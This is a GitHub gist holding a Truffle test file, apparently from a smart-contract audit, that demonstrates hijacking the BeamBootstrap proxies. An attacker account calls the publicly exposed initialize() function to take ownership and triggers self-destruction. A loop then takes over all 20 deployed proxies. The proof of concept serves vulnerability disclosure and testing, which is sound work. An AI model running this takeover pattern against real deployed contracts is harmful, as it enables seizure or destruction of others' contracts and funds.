-
-
Save mattaereal/9a7fe9d20b3c3253b1effe049cb9211e to your computer and use it in GitHub Desktop.
Bootstrap process can be hijacked
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
const ForwardProxy = artifacts.require('ForwardProxy'); | |
const BeamInitializable = artifacts.require('BeamInitializable'); | |
const BeamBootstrap = artifacts.require('BeamBootstrap'); | |
const Malicious = artifacts.require('Malicious'); | |
it("BeamInit proxy hijacking ", async () => { | |
const owner = accounts[0]; | |
const attacker = accounts[1]; | |
const user = accounts[2]; | |
let tryCatch = require("./exceptions.js").tryCatch; | |
let errTypes = require("./exceptions.js").errTypes; | |
// The logic for the proxy contract | |
var beamInit = await BeamInitializable.new(owner); | |
// The proxy contract | |
var proxyInit = await ForwardProxy.new(beamInit.address); | |
// The interface in order to use the proxy | |
var placeHolder = await BeamInitializable.at(proxyInit.address); | |
// An attacker decides to change ownership of BeamInitialized. | |
// A malicious contract is created. | |
const malicious = await Malicious.new(attacker); | |
// Attacker abuses intialize's public visibility to set himself to owner. | |
await placeHolder.initialize(malicious.address, { from: attacker }); | |
// Checking hijacking success. | |
assert.equal(await placeHolder.owner(), attacker); | |
// Successfull self-destruction by attacker. | |
placeHolder.cleanup({ from: attacker }); | |
}); | |
contract('Audit Testing', (accounts) => { | |
it("Bootstrap hijacking", async () => { | |
const owner = accounts[0]; | |
const attacker = accounts[1]; | |
const user = accounts[2]; | |
let tryCatch = require("./exceptions.js").tryCatch; | |
let errTypes = require("./exceptions.js").errTypes; | |
// The bootstrap contract. In deployed there are 20 proxy contracts | |
// using a BeamInitializable contract as the logic contract. | |
var bootstrap = await BeamBootstrap.new(owner, {from: owner}); | |
// Let's get the first proxy and set the interface. | |
var placeHolder = await BeamInitializable.at(await bootstrap.deployed(0)); | |
// Checking that ownership is as it should. | |
assert.equal(await placeHolder.owner(), owner); | |
// An attacker decides to change ownership of BeamInitialized. | |
// A malicious contract is created. | |
const malicious = await Malicious.new(attacker, {from: attacker}); | |
// Attacker abuses intialize's public visibility to set himself to owner. | |
placeHolder.initialize(malicious.address, {from: attacker}); | |
// Checking hijacking success. | |
assert.equal(await placeHolder.owner(), attacker); | |
// Mass hijacking + mass checking. | |
for(var i = 1; i < 20; i++) { | |
placeHolder = await BeamInitializable.at(await bootstrap.deployed(i)); | |
placeHolder.initialize(malicious.address, {from: attacker}); | |
assert.equal(await placeHolder.owner(), attacker); | |
} | |
}); | |
}); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment